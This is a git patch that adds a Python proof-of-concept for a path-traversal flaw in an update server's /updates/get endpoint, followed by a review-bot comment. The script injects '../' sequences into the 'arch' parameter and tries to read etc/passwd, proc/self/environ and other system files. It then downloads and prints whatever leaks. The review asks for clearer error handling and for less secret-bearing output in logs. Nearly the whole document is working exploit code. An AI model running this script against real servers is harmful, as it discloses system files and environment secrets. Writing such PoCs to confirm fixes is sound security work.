From 055b27989c6d77b48dad0bf6f6ace6180c8a1351 Mon Sep 17 00:00:00 2001
From: hugy
Date: Fri, 29 May 2026 07:10:03 +0000
Subject: [PATCH] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=B8=D1=82?= =?UTF-8?q?=D1=8C=20rosetta-sdu-2026-0000/poc2.py?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
rosetta-sdu-2026-0000/poc2.py | 39 +++++++++++++++++++++++++++++++++++
1 file changed, 39 insertions(+)
create mode 100644 rosetta-sdu-2026-0000/poc2.py
diff --git a/rosetta-sdu-2026-0000/poc2.py b/rosetta-sdu-2026-0000/poc2.py
new file mode 100644
index 0000000..cf5511c
--- /dev/null
+++ b/rosetta-sdu-2026-0000/poc2.py
@@ -0,0 +1,39 @@
+import sys
+import json
+from urllib.request import urlopen
+from urllib.parse import urlencode
+from urllib.error import URLError
+
+u = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8080"
+u = u.rstrip("/")
+t = ["etc/hostname", "etc/passwd", "proc/1/cmdline", "proc/self/environ", "proc/cpuinfo"]
+
+for d in range(1, 11):
+ up = "/".join([".."] * d)
+ for f in t:
+ a = f"{up}/{f}"
+ params = urlencode({
+ "platform": "android",
+ "arch": a,
+ "app": "1.0.0",
+ "kernel": "0.0.0"
+ })
+ try:
+ r = urlopen(f"{u}/updates/get?{params}", timeout=5)
+ data = json.loads(r.read())
+ except (URLError, ValueError):
+ continue
+
+ k = data.get("kernelUpdateRequired") or data.get("kernel_update_required")
+ kurl = data.get("kernelUrl") or data.get("kernel_url")
+ if k and kurl and ".." in kurl:
+ print(f"Found: {kurl}")
+ try:
+ c = urlopen(u + kurl, timeout=5).read().decode("utf-8", errors="replace")
+ print(c[:1000])
+ except URLError:
+ print("Download failed")
+ sys.exit(0)
+
+print("Not vulnerable")
+sys.exit(1)
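Review bot: The final `Not vulnerable` verdict is also reached when every request failed, because `except (URLError, ValueError): continue` swallows connection errors and unparsable responses, so an unreachable or mistyped target is reported the same as a patched one. Anyone using this to confirm a fix needs the two cases separated: set `ok = False` before the loop, `ok = True` right after the `json.loads` line, and put `if not ok: print("No valid response from target"); sys.exit(2)` ahead of the last `print`. The handlers are also narrower than the failures that can occur: a timeout during `r.read()` is likely raised as `TimeoutError` rather than `URLError`, and a JSON body that is not an object makes `data.get` raise `AttributeError`, so `except (OSError, ValueError)` plus an `isinstance(data, dict)` check would keep the run from ending in a traceback. Finally, `print(c[:1000])` writes the fetched file content (for `proc/self/environ`, possibly secrets) into terminal or CI logs; for verification, printing the length or a hash of `c` is enough.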